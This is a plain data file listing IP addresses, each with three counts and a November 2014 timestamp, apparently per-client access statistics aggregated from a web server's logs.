175.44.25.209 2 2 24096 20141103225604
165.233.50.145 1 3 11639 20141103084500
14.1.198.7 3 7 40696 20141123094034
213.198.226.20 3 5 35060 20141122103417
62.24.181.135 3 3 42383 20141111171112
82.55.116.246 1 3 11639 20141105143442
152.26.228.62 1 3 11639 20141119105518
24.138.75.109 2 4 197629 20141119034609
209.6.175.150 2 4 197629 20141122160543
2.101.56.110 1 1 8102 20141105150934
71.245.80.131 1 3 14198 20141129215652
142.157.118.101 4 8 222028 20141111113100
179.99.136.196 1 3 11639 20141117162826
202.186.7.226 1 1 21521 20141115055619
75.72.151.77 3 5 265837 20141124181439
190.63.130.53 1 3 11639 20141126155637
220.181.141.70 1 1 8102 20141104090319
167.160.105.146 2 2 34281 20141120132249
70.193.214.213 1 3 11639 20141108081355
171.49.148.20 1 3 11639 20141116104241
79.97.48.224 20 26 1160195 20141126183932
12.239.13.142 2 4 19741 20141121181911
84.117.193.174 2 6 23278 20141124065104
134.220.246.56 3 5 212948 20141110071103
69.196.253.30 1 1 10661 20141118105302
87.2.19.181 1 3 11639 20141104092011
140.184.133.185 4 6 354263 20141101131227
98.118.137.144 7 9 478692 20141123094411
46.4.124.178 10 10 476022 20141112081655
208.80.194.123 0 1 1276 
141.217.86.102 1 1 8102 20141117134149
182.66.15.163 1 3 11639 20141114054427
192.138.80.211 1 1 8102 20141104142938
130.189.10.64 1 4 11639 20141112150634
195.211.155.253 4 4 86084 20141126084320
125.227.154.19 20 46 873736 20141120072836
24.210.133.212 4 8 395258 20141117210952
195.83.48.83 1 3 11639 20141104101335
190.122.130.2 1 1 8102 20141108142336
190.202.5.210 1 2 9378 20141111100535
144.76.185.173 3 3 295850 20141128231611
130.49.174.120 7 13 238521 20141117123101
95.232.10.45 1 3 11639 20141108131843
35.13.160.208 7 11 64313 20141101153618
80.17.36.146 1 3 11639 20141128045932
176.31.22.227 2 2 34281 20141129194543
213.125.81.178 9 17 401251 20141120062116
69.138.150.120 10 12 222888 20141102212355
59.149.192.206 2 4 19741 20141106112707
68.65.255.133 2 2 34281 20141130200353
141.51.218.39 1 3 11639 20141126065020
181.226.65.207 2 4 19741 20141129165424
140.142.217.13 3 5 148055 20141103115301
161.23.55.223 3 5 35060 20141130101958
14.139.45.242 3 5 208290 20141111031820
37.6.68.2 7 9 230660 20141110101828
151.18.28.76 1 3 11639 20141113090213
175.44.25.17 1 1 12048 20141101015319
36.72.75.115 1 3 11639 20141122040927
66.220.158.118 1 1 8102 20141129130747
179.126.17.104 1 3 11639 20141106155519
5.151.0.185 3 5 106026 20141129120405
187.172.93.44 2 2 16204 20141125132754
61.135.190.220 2 2 16204 20141119092318
78.134.125.121 8 14 431537 20141114132757
175.44.6.99 2 2 24096 20141107000348
144.76.163.48 1 1 143874 20141103072517
130.60.235.139 1 3 71745 20141128082103
49.230.104.213 1 3 11639 20141128212551
41.100.228.34 1 3 11639 20141111151751
134.249.167.157 2 2 16204 20141120174235
78.250.68.7 2 2 12858 20141127163708
68.225.34.159 5 9 326345 20141116185434
147.46.177.93 1 3 11639 20141104060046
91.252.234.179 4 6 35945 20141117084800
134.190.192.223 1 1 8102 20141102203517
199.17.134.52 4 6 213046 20141113095534
123.63.207.17 1 2 187266 20141101072301
184.151.178.210 1 3 11639 20141113164927
66.249.83.191 0 3 4813 
208.52.161.186 8 8 310627 20141121165052
182.188.169.51 5 9 37427 20141110092506
199.202.95.19 3 5 208290 20141103182501
175.44.24.55 3 3 36144 20141104234824
79.13.92.155 1 3 11639 20141125161523
76.164.225.90 2 2 16204 20141103115348
104.38.79.169 14 18 392854 20141105133932
210.48.147.132 4 6 346259 20141113212334
205.208.21.91 2 6 24859 20141103105234
220.181.51.82 2 2 24808 20141114092222
64.233.173.189 1 1 143874 20141130124826
199.30.25.78 0 2 3537 
54.80.100.124 1 1 8102 20141111003158
198.199.66.41 8 10 327583 20141127190746
41.150.255.43 1 1 12760 20141106235046
68.195.191.72 4 6 171717 20141123104755
129.81.67.8 1 3 11639 20141111153721
93.43.233.126 1 3 11639 20141103053123
103.21.126.76 5 7 225806 20141110052913
94.183.180.49 1 3 11639 20141129093014
92.44.221.245 2 4 24399 20141110040622
146.79.254.10 2 4 79847 20141104162733
164.106.75.253 2 6 25837 20141119145103
210.199.227.18 1 1 8102 20141112110603
146.186.32.250 5 7 281254 20141111091624
74.118.22.7 1 1 8102 20141129211841
123.243.105.106 1 3 11639 20141109072347
71.161.112.251 2 4 19741 20141120182928
54.80.104.26 1 3 8293 20141101212135
120.43.20.243 1 1 21521 20141106190022
86.144.130.184 1 3 11639 20141112155017
131.212.182.152 4 6 40603 20141124143050
135.23.214.176 7 11 63073 20141130132211
162.220.98.91 2 4 16395 20141113092342
179.184.197.68 1 3 11639 20141116185817
151.27.224.77 1 3 11639 20141105133651
176.77.136.121 5 9 100998 20141104081019
130.211.136.192 1 1 8102 20141127110720
80.111.228.217 13 17 492755 20141123145702
205.193.94.40 1 3 11639 20141118114548
177.6.247.93 1 3 11639 20141122211502
151.227.39.160 17 25 549602 20141120105347
210.186.137.162 4 5 229649 20141124024550
130.166.199.148 3 5 35060 20141115141029
173.0.60.184 2 2 20862 20141114024407
171.221.163.251 1 1 8102 20141124003324
109.103.65.254 3 5 27843 20141104160033
145.97.213.254 1 3 11639 20141130201956
191.205.0.113 2 4 18954 20141118212436
38.100.21.68 8 10 327583 20141121172814
140.148.200.191 2 4 197629 20141119190858
23.115.203.101 2 4 155513 20141126212507
179.254.10.43 1 3 11639 20141126055737
74.74.94.43 1 3 11639 20141102172520
120.43.31.114 1 1 12048 20141117051833
24.5.181.210 6 10 238692 20141114130507
188.183.108.90 2 4 37818 20141128154621
182.255.119.114 1 1 143874 20141106222350
54.221.0.173 1 1 8102 20141111000714
88.197.47.174 4 4 36279 20141115142347
132.3.25.80 2 6 23278 20141120075428
76.25.229.71 1 3 11639 20141108170754
123.125.68.137 1 1 12760 20141102031515
129.120.195.16 2 4 18954 20141110140559
24.191.35.7 5 11 411555 20141128082309
198.178.124.47 2 2 16204 20141105000400
209.131.80.22 7 11 304341 20141108184207
105.184.139.84 2 4 197629 20141112051900
101.220.173.114 5 7 367023 20141127024423
199.30.25.160 0 1 1276 
209.147.118.103 0 1 2261 
69.78.223.101 3 5 90508 20141110125314
107.72.162.93 1 3 11639 20141106175318
76.121.24.153 4 8 99588 20141112160822
130.15.32.178 8 12 408745 20141113134700
152.20.238.82 5 9 285578 20141126084541
46.29.21.37 1 1 68208 20141126032545
130.211.168.86 1 1 8102 20141105101249
66.249.83.185 1 2 10363 20141123142252
82.159.201.132 1 3 16297 20141110055009
115.70.201.250 10 14 458601 20141120230049
64.213.222.254 4 6 443261 20141118215717
104.156.56.14 1 1 8102 20141126120857
41.150.198.248 4 6 213833 20141106085831
68.194.102.220 1 3 11639 20141101154837
121.245.157.121 4 6 49364 20141124103802
74.58.253.132 1 3 11639 20141111184259
50.19.202.224 2 2 190746 20141101211607
74.129.188.191 6 10 434110 20141105170330
46.182.158.235 1 3 11639 20141106170249
46.242.10.176 1 3 16297 20141121203402
70.161.143.44 7 9 211769 20141116182523
121.205.243.133 1 1 21521 20141118051854
122.129.73.117 2 2 29623 20141109025641
118.163.199.170 10 16 704134 20141106023021
132.3.61.81 1 3 71745 20141114155637
125.63.54.73 2 4 19741 20141129104716
134.197.66.109 5 9 357898 20141106162314
139.86.2.15 5 7 221935 20141125231444
130.211.166.115 1 1 8102 20141128110745
107.77.90.50 2 6 23278 20141106080353
78.158.11.226 4 4 152620 20141116204212
138.162.128.52 4 4 743960 20141103192757
199.212.67.57 2 4 19741 20141119155706
85.115.54.180 1 1 143874 20141106111421
187.14.72.81 1 3 11639 20141123223056
65.55.215.234 1 3 11639 20141123061817
138.162.0.43 1 2 9378 20141119100150
101.163.77.152 6 10 350440 20141103061136
130.211.161.223 1 1 8102 20141111110818
180.153.206.16 1 1 8102 20141122062612
147.188.113.105 2 4 197629 20141117123649
197.157.193.83 2 4 19741 20141111051217
186.223.95.89 1 3 11639 20141123191019
207.181.209.76 1 3 11639 20141119133954
131.253.24.81 1 3 71745 20141128094117
66.249.82.37 1 3 11639 20141105084332
74.97.17.150 7 9 362222 20141129145351
41.190.2.219 1 3 25058 20141103070559
175.111.91.124 5 11 183547 20141127212903
120.62.181.204 4 8 233348 20141110073811
171.221.165.27 1 1 8102 20141117000018
86.179.138.182 1 3 11639 20141102122131
79.127.119.136 1 3 25058 20141116112226
203.213.34.26 2 4 197629 20141104203335
77.187.65.180 2 4 19741 20141101082115
54.172.0.42 1 1 8102 20141102130852
174.6.109.79 5 9 65661 20141117233327
199.30.24.178 1 3 14198 20141127182054
184.98.219.186 4 4 32408 20141124110200
78.46.156.162 3 3 24306 20141107224423
130.211.153.38 1 1 8102 20141109101239
64.237.238.61 5 7 402382 20141111111007
66.249.84.197 6 6 76560 20141128223802
175.44.27.20 3 3 36144 20141104055756
175.44.5.69 4 4 48192 20141105075826
146.182.18.47 3 5 32501 20141126074645
162.206.196.34 2 6 201166 20141119024928
66.249.85.37 10 10 559567 20141113213309
144.32.240.47 1 3 11639 20141104063409
148.100.231.238 4 8 218491 20141110142243
152.133.6.131 1 3 11639 20141126114638
174.102.69.233 1 3 11639 20141106140846
112.198.82.177 1 3 11639 20141113110109
159.224.139.133 2 2 16204 20141104034957
209.147.108.101 1 3 11639 20141113155737
163.156.213.193 3 5 32501 20141120123109
129.176.151.24 4 7 50081 20141114142459
112.198.82.158 1 3 11639 20141119092107
177.64.242.23 1 3 11639 20141101095245
199.47.81.13 1 1 185990 20141122113547
61.90.18.77 1 3 11639 20141112234250
202.40.139.165 19 25 874251 20141110050138
200.120.131.135 3 7 91486 20141110011945
24.139.206.219 1 3 11639 20141112044818
42.3.140.128 2 4 197629 20141103055952
130.101.216.138 3 6 207992 20141118173639
94.13.102.229 2 4 24399 20141103054259
179.252.24.163 1 3 11639 20141124070223
93.190.140.145 19 19 943942 20141114202435
80.40.134.103 1 1 8102 20141105135143
199.17.139.254 2 2 20862 20141119125220
147.47.228.50 1 3 16297 20141111204808
27.153.219.56 1 1 21521 20141104143815
27.153.137.153 1 1 21521 20141112204624
24.244.29.183 1 3 11639 20141125125130
75.58.164.101 6 8 51434 20141106143511
24.201.220.242 3 5 35060 20141119112320
175.44.6.129 11 11 132528 20141121102958
95.45.25.111 6 10 471568 20141119175203
94.161.87.52 5 7 173127 20141125111102
1.160.28.249 2 4 79847 20141121031043
130.15.32.209 1 3 11639 20141115143444
95.239.239.163 5 7 44047 20141108092250
120.37.236.90 1 1 68208 20141103110730
148.88.244.117 1 3 11639 20141121085446
66.193.220.70 21 23 1367649 20141121112706
130.211.189.46 1 1 8102 20141104101337
88.248.170.63 1 3 11639 20141111044613
81.154.238.22 2 4 22300 20141128112257
66.220.156.112 1 1 10661 20141122231211
98.110.145.45 8 10 248800 20141121213020
92.155.11.123 1 3 11639 20141116121017
188.240.88.250 1 1 8102 20141128060320
186.135.21.75 1 3 11639 20141110151755
89.96.138.15 5 7 360266 20141120073644
115.185.163.67 1 3 11639 20141130024644
94.69.137.84 1 3 11639 20141117104910
89.163.239.65 1 1 8102 20141124071333
83.42.250.83 1 1 8102 20141111055216
86.180.32.178 2 4 22300 20141125040409
72.69.176.172 5 9 426008 20141130165920
130.211.185.162 1 1 8102 20141107110835
66.249.84.165 1 1 143874 20141103102908
209.147.118.200 0 1 1276 
194.117.2.66 3 5 24497 20141116103905
94.195.176.221 5 7 464587 20141116113334
104.194.12.134 1 1 8102 20141103091039
110.77.141.82 1 1 8102 20141106193747
61.135.190.221 6 6 48612 20141129061227
193.1.104.12 8 12 313755 20141126135957
75.26.166.170 4 6 105827 20141121141903
76.79.181.242 4 6 45261 20141124192858
140.251.179.97 7 19 234078 20141111151604
70.197.3.167 2 4 197629 20141114221115
120.23.79.186 1 3 11639 20141120192027
129.81.101.65 4 8 214024 20141124152446
79.121.105.158 3 7 84603 20141115160623
88.21.95.43 1 3 11639 20141121180349
216.228.143.130 1 3 11639 20141119115741
67.163.161.150 10 14 556961 20141109224047
24.0.241.121 1 3 11639 20141115185446
81.145.249.173 1 3 11639 20141104053342
193.61.160.60 2 4 197629 20141126075700
210.55.213.210 1 3 11639 20141101175516
162.209.125.25 3 7 31380 20141130153258
174.68.87.147 9 17 289933 20141124191215
122.162.174.229 4 6 349605 20141130021057
209.147.118.139 1 2 10363 20141115143204
202.0.107.126 1 3 11639 20141117043405
130.15.32.88 6 8 294801 20141113134430
150.216.10.60 3 7 205731 20141105165550
220.255.1.127 0 1 2261 
208.33.74.62 1 3 11639 20141103115507
27.150.202.150 1 1 68208 20141101182144
65.92.115.27 1 3 11639 20141111213841
143.229.238.147 2 4 37818 20141119083626
159.117.1.11 10 14 293123 20141104165454
199.17.128.47 1 1 143874 20141119092646
86.81.80.126 2 4 197629 20141116051005
193.204.171.1 2 7 25539 20141126030307
24.106.10.198 3 5 205731 20141114105200
76.180.192.52 13 21 653519 20141109024221
144.74.1.114 5 9 222126 20141124123639
194.80.99.183 1 3 11639 20141104092203
129.49.157.27 1 3 11639 20141105133421
201.21.126.187 1 3 11639 20141121110928
187.133.61.114 1 3 11639 20141120055817
103.246.201.61 1 1 143874 20141110110642
188.92.76.167 4 4 0 20141105045054
198.199.66.231 8 10 327583 20141107111543
130.211.138.141 1 1 8102 20141130110858
79.18.225.207 8 12 742638 20141118205822
203.127.72.17 1 6 10661 20141103025804
71.241.146.187 1 1 143874 20141102203248
70.215.2.210 8 12 253721 20141123173133
121.54.32.103 1 3 11639 20141110060010
152.16.51.188 3 7 209268 20141119111214
173.193.103.158 1 1 68208 20141129080351
193.206.176.82 1 3 11639 20141117054555
161.74.220.200 10 14 401039 20141118080810
61.135.190.102 2 2 16204 20141112134122
50.163.182.219 1 3 11639 20141101135446
134.226.169.203 1 3 11639 20141110104449
89.114.80.104 1 3 11639 20141105141314
176.193.155.3 1 3 11639 20141118161638
83.248.36.134 1 3 11639 20141112082016
68.109.159.252 1 3 11639 20141127144609
220.181.51.76 1 1 8102 20141107095128
41.59.7.190 1 3 14198 20141107031654
205.167.120.201 1 3 16297 20141105161729
89.154.222.55 1 3 11639 20141126182257
112.64.235.248 1 1 8102 20141124061904
197.6.111.85 1 3 11639 20141105120811
177.38.20.202 1 3 11639 20141114180841
125.212.120.126 2 4 33160 20141106030554
148.251.75.46 2 2 16204 20141125185926
2.227.151.226 2 4 22300 20141129131753
130.91.63.93 1 3 11639 20141103120115
27.159.223.251 1 1 8102 20141111040606
69.27.229.11 1 3 11639 20141117104034
46.193.65.158 3 5 166174 20141126151737
71.169.114.111 12 16 668887 20141126085058
161.223.224.13 1 1 143874 20141119133618
80.0.251.1 1 3 71745 20141111123122
80.235.136.151 5 7 224494 20141105212611
174.53.211.22 4 8 55460 20141106141203
69.246.223.186 2 4 22300 20141123152830
202.98.222.249 2 4 24399 20141102053503
190.181.184.175 1 3 11639 20141121143605
71.179.10.147 4 8 224587 20141124165253
198.111.71.10 1 3 11639 20141125135413
39.55.223.13 1 2 10363 20141109025427
198.148.27.23 1 1 8102 20141104080636
132.185.160.96 1 3 11639 20141112070208
177.65.28.56 1 3 11639 20141130174415
93.150.133.110 1 3 11639 20141114071650
41.37.31.51 3 5 27843 20141126214443
220.249.101.92 1 3 71745 20141121200827
2.137.163.41 3 5 84603 20141122041931
94.14.220.120 2 4 22300 20141109123400
77.233.143.93 1 3 11639 20141107061722
205.170.235.246 1 3 16297 20141123160928
152.20.238.37 7 11 479670 20141126090400
155.143.42.96 17 21 770050 20141105170701
130.154.3.250 7 13 127431 20141117101103
216.185.63.199 1 3 14198 20141107060728
110.55.0.104 1 1 10661 20141110001446
37.115.187.165 1 1 8102 20141121140902
201.94.224.70 1 3 11639 20141123123554
172.254.119.47 2 4 22300 20141117193033
101.128.92.105 1 1 8102 20141101065048
138.162.0.41 0 1 2261 
202.56.13.161 1 1 68208 20141101051503
99.57.174.15 3 7 167152 20141120113242
182.69.181.24 11 15 410304 20141112123936
141.225.243.254 1 1 8102 20141118095050
198.205.17.200 6 12 299776 20141113143632
207.167.69.5 1 3 11639 20141101192326
84.213.40.84 1 3 11639 20141110075738
31.15.163.101 1 3 11639 20141121023130
107.141.113.148 1 3 11639 20141128131202
158.182.174.229 3 5 35060 20141119004517
69.168.143.201 3 5 30402 20141120133241
130.211.177.142 1 1 8102 20141108110802
24.85.220.146 1 1 8102 20141114204403
125.212.120.112 4 8 227252 20141115052145
202.184.111.90 1 3 11639 20141107091238
152.13.249.240 4 8 46699 20141114165552
192.100.69.146 1 3 14198 20141117151843
179.185.24.88 1 3 11639 20141119104554
95.211.224.26 2 2 287748 20141120144142
206.244.94.102 2 4 155513 20141105104259
202.186.7.90 0 1 2261 
107.221.225.5 1 3 11639 20141105164108
108.184.164.158 1 1 143874 20141106215304
131.172.36.45 6 12 244788 20141127001906
216.107.157.105 2 2 24808 20141103002357
188.32.129.237 8 8 537458 20141108035835
91.253.221.184 2 4 19741 20141128170615
50.70.24.129 2 4 37818 20141122181439
130.211.160.189 1 1 8102 20141120110800
46.7.23.135 8 12 390208 20141119165215
50.199.30.194 5 7 356920 20141108002115
41.223.161.19 1 3 11639 20141117093957
192.187.110.179 1 1 21521 20141109010514
115.91.219.4 2 6 25837 20141120210943
78.19.118.181 4 6 32671 20141115144611
67.223.210.124 1 3 16297 20141129224039
112.118.101.140 1 3 14198 20141106100355
200.24.16.13 2 4 24399 20141104143722
212.250.30.1 1 3 11639 20141112112233
189.211.70.0 4 6 181033 20141110121613
2.98.199.155 6 8 241200 20141104054929
186.3.237.4 1 3 11639 20141118192752
92.87.204.236 18 22 527960 20141104075613
14.136.145.84 2 4 19741 20141109100826
177.189.87.63 1 3 11639 20141127185240
195.195.4.180 5 11 225663 20141127032244
128.187.191.254 1 3 11639 20141117161435
180.246.218.18 3 5 35060 20141118071949
128.250.5.248 10 12 563229 20141127002453
39.55.223.136 0 1 1276 
92.104.9.178 1 3 11639 20141129081222
119.235.55.10 1 3 11639 20141117090533
112.198.82.174 1 3 11639 20141119021923
67.180.22.166 4 6 291929 20141130145643
36.85.78.32 1 3 16297 20141122015857
220.255.1.37 1 1 8102 20141108090130
66.249.81.230 4 4 223715 20141104151353
2.27.235.126 22 26 639666 20141110093602
130.211.158.122 1 1 8102 20141114110827
213.82.235.226 1 3 11639 20141107034019
14.97.72.147 2 4 26958 20141111235953
69.85.215.55 3 7 33939 20141111140240
186.116.10.42 2 6 22300 20141113111957
130.85.240.123 6 10 198675 20141109170756
73.183.148.192 21 25 401316 20141128173823
199.212.69.250 2 2 16204 20141114145900
196.40.1.86 1 3 11639 20141125160127
197.225.235.116 1 3 11639 20141128000756
137.219.252.196 1 3 11639 20141108205141
79.169.235.24 1 3 11639 20141125171308
132.3.25.78 1 3 11639 20141120075357
46.62.180.242 1 3 11639 20141104114158
190.206.255.220 1 3 11639 20141111130314
65.246.88.3 3 9 208290 20141107112214
12.252.242.6 2 4 19741 20141103125707
129.81.98.237 7 9 183022 20141119130623
46.105.135.89 2 2 34281 20141129212817
198.232.251.44 2 4 19741 20141118150219
149.142.103.148 1 3 14198 20141126150723
201.17.197.58 1 3 11639 20141110120909
166.137.139.111 1 3 11639 20141113143639
123.125.68.139 1 1 12760 20141102031515
199.111.119.46 1 3 11639 20141107153044
130.211.166.1 1 1 8102 20141115110947
190.206.95.187 1 3 11639 20141115102351
129.79.34.152 1 3 11639 20141109222101
147.188.228.119 2 4 22300 20141110094519
134.124.119.128 6 10 175898 20141114105918
58.169.209.248 1 3 11639 20141103061915
172.12.199.47 4 8 102147 20141117232708
125.164.133.20 5 11 48867 20141105120017
72.80.190.182 3 5 90508 20141101161411
202.88.252.91 1 3 11639 20141112032751
5.12.226.190 2 4 155513 20141108064820
37.233.62.225 1 3 11639 20141112184308
75.9.201.94 1 1 143874 20141104141213
99.224.56.11 1 3 11639 20141129230512
166.78.178.186 10 10 0 20141130074009
76.104.139.191 1 3 11639 20141124142249
49.138.27.216 3 5 27843 20141127042956
199.128.236.109 3 7 104905 20141125143540
192.188.51.83 1 3 11639 20141127093404
147.31.135.78 1 3 11639 20141119105823
61.18.92.215 1 3 11639 20141116021549
107.178.200.33 1 1 8102 20141121083402
171.221.160.30 1 1 8102 20141102112323
198.161.2.211 2 4 24859 20141108155424
218.237.85.19 1 3 11639 20141108083119
130.225.1.76 4 7 220752 20141113015143
131.96.116.75 4 6 43162 20141106160317
185.10.224.66 6 10 237445 20141105184050
74.133.104.6 1 3 11639 20141102182243
94.65.213.71 1 3 11639 20141116160413
223.176.240.197 2 4 13049 20141110220023
203.100.4.220 2 4 19741 20141104221326
111.68.103.103 8 10 131018 20141112034809
206.177.43.77 4 6 278597 20141106094640
180.251.88.255 1 1 8102 20141107032107
199.30.25.246 0 1 1276 
218.250.120.158 1 1 8102 20141102221359
198.177.94.250 8 12 397885 20141117123102
92.243.167.154 20 22 1333972 20141109135608
76.245.246.23 1 3 11639 20141119202236
202.186.7.79 1 1 8102 20141115054656
76.100.144.86 7 13 252890 20141113174459
155.98.164.38 7 9 294184 20141125151940
209.88.95.190 4 10 58997 20141126032640
177.102.50.183 1 3 11639 20141128201102
74.92.104.138 1 3 11639 20141111181044
182.178.12.131 3 5 37159 20141104071803
166.216.165.120 7 11 482229 20141110144845
65.55.210.76 0 1 1276 
82.56.62.246 2 4 19741 20141125164319
191.5.99.51 1 3 11639 20141126165127
95.49.248.182 2 4 22300 20141121150820
86.187.50.174 2 4 22300 20141118100835
41.212.8.46 1 3 11639 20141103083818
212.183.128.235 3 5 27843 20141129123008
110.85.127.244 4 4 67138 20141130192147
68.74.64.30 2 4 19741 20141112084942
37.209.99.130 8 12 370515 20141109072926
130.211.178.199 1 1 8102 20141103110846
166.137.139.47 1 1 143874 20141108110350
61.135.190.100 2 2 16204 20141109031024
209.172.248.146 2 4 197629 20141105131342
189.131.33.224 1 3 11639 20141128104521
65.34.112.185 1 3 11639 20141121151008
144.214.128.42 3 7 211827 20141115073504
86.167.160.199 4 6 231910 20141119101633
91.240.227.153 6 12 302335 20141126061609
98.223.78.42 1 1 143874 20141106164827
174.69.108.45 4 6 35945 20141126155457
86.97.108.212 1 3 11639 20141124075123
175.159.14.237 1 1 8102 20141103205320
130.211.178.104 1 1 8102 20141129101319
61.10.114.204 4 6 35945 20141108193251
61.135.190.219 5 5 40510 20141117053035
195.169.170.140 2 4 19741 20141106091757
143.167.125.173 10 14 326685 20141125112212
179.127.197.191 1 3 11639 20141120131538
130.211.164.216 1 1 8102 20141113101405
129.120.2.134 3 3 24306 20141112144315
218.106.182.165 3 5 168273 20141117081815
173.53.75.235 2 4 24399 20141129213809
24.33.88.236 1 3 11639 20141119203016
107.77.83.77 2 4 22300 20141130224314
86.21.34.253 1 3 11639 20141110050523
73.169.90.126 5 7 356920 20141116190307
68.49.48.253 2 4 22300 20141121092244
184.36.49.35 1 3 11639 20141111202108
142.1.140.31 2 4 168932 20141128110442
194.176.105.150 14 21 273601 20141128094754
78.23.243.187 8 10 318822 20141128032511
202.62.16.28 3 5 202385 20141118185257
39.59.42.37 1 3 25058 20141105132100
58.42.31.110 2 2 72964 20141102053452
132.3.25.79 2 4 200188 20141120075440
209.251.63.19 1 3 11639 20141126161023
68.191.207.254 4 8 315684 20141111143339
117.206.177.25 8 12 313755 20141110232404
192.34.62.233 8 10 327583 20141114045952
199.235.84.232 1 3 11639 20141107112841
142.244.50.106 1 3 11639 20141118094743
209.147.118.6 1 1 143874 20141115165259
75.111.43.163 9 17 454717 20141124152729
166.137.12.33 1 1 185990 20141101022325
41.202.240.7 2 4 155513 20141125125006
199.212.66.234 3 3 28964 20141112135920
24.202.138.79 7 11 381319 20141119105844
95.175.156.120 1 3 71745 20141109150936
124.124.208.50 1 3 11639 20141109044735
182.189.240.146 1 3 16297 20141114000022
61.135.190.224 3 3 24306 20141124181751
98.84.118.80 2 4 197629 20141115211611
197.163.118.187 1 2 9378 20141107211204
198.148.27.12 2 2 16204 20141106103211
114.79.13.170 2 4 155513 20141123022435
170.27.135.254 8 13 492592 20141106120101
134.10.31.28 6 10 243350 20141123180741
74.8.80.62 1 3 11639 20141112090231
220.130.154.54 21 55 763614 20141121014243
162.231.127.33 1 3 11639 20141103130556
194.81.106.242 2 4 24399 20141102102856
201.32.141.117 1 1 10661 20141123010405
108.14.103.49 2 2 16204 20141113125700
5.151.2.204 1 1 143874 20141129211630
148.251.124.42 1 1 143874 20141113131855
137.191.246.30 9 17 272683 20141126055235
145.108.233.195 1 3 14198 20141105080120
192.12.88.139 2 4 19741 20141118154409
64.131.32.151 3 5 30402 20141121214619
190.97.179.28 1 3 11639 20141129225627
98.111.120.67 2 4 155513 20141112122445
175.44.4.212 2 2 24096 20141129174551
121.169.194.17 1 3 11639 20141112042130
175.169.22.15 1 3 189527 20141104064609
134.226.168.88 4 6 171717 20141110094053
38.112.107.82 1 1 143874 20141124174024
122.167.67.160 2 2 25520 20141114023458
199.231.28.148 1 3 11639 20141125114046
152.16.52.207 1 3 11639 20141105160625
69.85.215.54 1 3 11639 20141111151613
87.107.188.205 1 3 11639 20141105154639
106.69.12.199 1 1 185990 20141108235211
133.6.28.46 3 7 27843 20141128011139
118.168.3.8 1 1 8102 20141107153948
144.214.132.81 1 3 11639 20141119023238
80.22.152.238 1 3 11639 20141124124222
130.211.143.149 1 1 8102 20141111101301
82.84.139.65 1 3 11639 20141127025044
76.104.24.241 4 8 235447 20141109090132
62.24.222.132 1 1 8102 20141113114955
98.240.238.217 1 1 8102 20141126223859
134.190.149.191 1 1 8102 20141126120913
130.211.184.63 2 2 16204 20141109110829
182.189.75.224 7 9 654021 20141128054211
86.3.197.86 1 3 11639 20141115103448
128.239.115.52 17 21 841310 20141106205835
194.82.51.28 0 1 0 
175.44.6.229 3 3 36144 20141105071951
92.30.254.167 1 1 8102 20141113114924
70.192.4.253 2 2 287748 20141123003332
130.211.173.85 1 1 8102 20141107101259
66.205.167.100 6 8 405891 20141124134404
175.44.6.173 1 1 12048 20141104004920
152.130.6.198 7 17 370658 20141112151325
175.44.4.181 1 1 12048 20141104051538
88.16.183.24 1 3 11639 20141105121647
130.211.136.200 1 1 8102 20141108101459
212.24.91.66 2 5 155513 20141125061505
142.158.254.202 0 3 0 
202.162.37.68 1 3 11639 20141124023150
104.138.197.75 5 7 44047 20141118172530
71.61.223.148 8 12 369203 20141115143046
214.28.226.229 6 8 369680 20141118125526
71.166.178.125 1 3 71745 20141114110501
35.13.160.144 4 8 50379 20141104101005
137.73.104.4 7 9 75054 20141120061625
128.248.88.152 2 4 22300 20141124121634
205.167.120.207 6 8 548355 20141105140948
41.13.88.157 9 11 498767 20141106054451
128.189.206.16 2 6 19741 20141114124944
189.189.250.117 1 3 11639 20141119160456
94.187.110.61 1 3 11639 20141123032212
134.106.153.230 6 10 426106 20141119062359
114.79.29.240 1 3 11639 20141116235701
36.248.167.168 2 2 24096 20141104220951
50.65.142.2 3 7 31380 20141111123002
82.114.92.134 1 3 11639 20141120023621
143.205.176.60 4 8 171908 20141110112426
92.234.29.222 1 3 11639 20141116094522
184.71.250.90 2 4 197629 20141119124305
98.204.57.50 3 5 163615 20141106101205
54.196.157.159 1 3 11639 20141129204414
134.220.66.0 7 11 384665 20141113125904
129.81.20.78 1 3 11639 20141114120705
138.163.160.42 4 11 43019 20141119072508
216.162.147.116 1 3 11639 20141118011612
130.211.147.119 1 1 8102 20141115101343
190.195.34.72 4 6 35945 20141106184626
201.0.89.148 1 3 11639 20141119090722
184.101.171.158 2 4 197629 20141110021848
187.75.71.112 1 3 11639 20141103152205
99.101.178.87 2 4 22300 20141129190134
177.207.248.42 1 3 11639 20141123152131
137.110.242.107 4 6 35945 20141114173815
69.242.65.112 1 3 11639 20141119002511
85.18.225.28 1 3 11639 20141126135205
66.249.84.185 4 4 51040 20141112121456
5.69.109.34 1 3 25058 20141117014901
112.198.82.23 1 3 11639 20141113042308
95.210.188.191 1 3 11639 20141110032557
189.74.227.48 1 3 11639 20141113070814
85.74.225.236 5 9 222126 20141104024723
200.106.36.172 7 11 201472 20141104090915
5.51.21.88 3 5 168273 20141124164241
79.32.62.168 1 3 11639 20141129121514
58.23.18.245 1 1 68208 20141111032314
130.211.152.152 1 1 8102 20141126101347
198.76.89.7 3 5 208290 20141104104124
113.255.29.149 10 14 281728 20141130063508
210.0.178.23 1 3 11639 20141127030432
14.139.159.99 7 13 309977 20141128042118
209.105.207.21 3 7 209268 20141126154756
39.47.193.224 1 3 11639 20141110071721
130.211.188.217 1 1 8102 20141124101250
108.24.41.178 20 26 906624 20141130163736
132.79.9.15 6 10 293680 20141105182101
130.211.136.132 1 1 8102 20141106101259
192.96.203.98 1 1 185990 20141105102251
129.115.2.114 3 7 387156 20141110133434
193.35.235.117 1 3 11639 20141105094756
61.135.190.105 1 1 8102 20141110000256
98.248.185.234 2 4 24399 20141120182613
132.3.61.80 2 4 139953 20141114155634
209.147.118.102 0 1 1276 
92.7.48.244 3 9 61755 20141109085900
146.186.104.47 1 3 11639 20141104152900
130.211.171.85 1 1 8102 20141103101248
14.139.186.82 1 3 11639 20141110055456
193.201.224.10 1 1 8102 20141118020859
176.183.67.175 1 3 11639 20141124111610
130.211.141.218 1 1 8102 20141106110844
94.9.65.242 6 8 369680 20141110134447
190.166.133.36 1 3 11639 20141130104410
24.63.151.188 2 6 23278 20141129142922
175.45.189.139 2 4 22300 20141102231045
138.162.128.53 0 4 8059 
50.12.45.90 1 3 71745 20141107152643
82.80.249.167 9 11 471457 20141103211430
130.211.160.3 1 1 8102 20141129110707
216.185.63.148 2 4 33160 20141128090352
132.181.251.217 13 17 636599 20141105210913
87.220.195.14 7 11 438866 20141105133229
223.255.230.230 8 12 616852 20141118015804
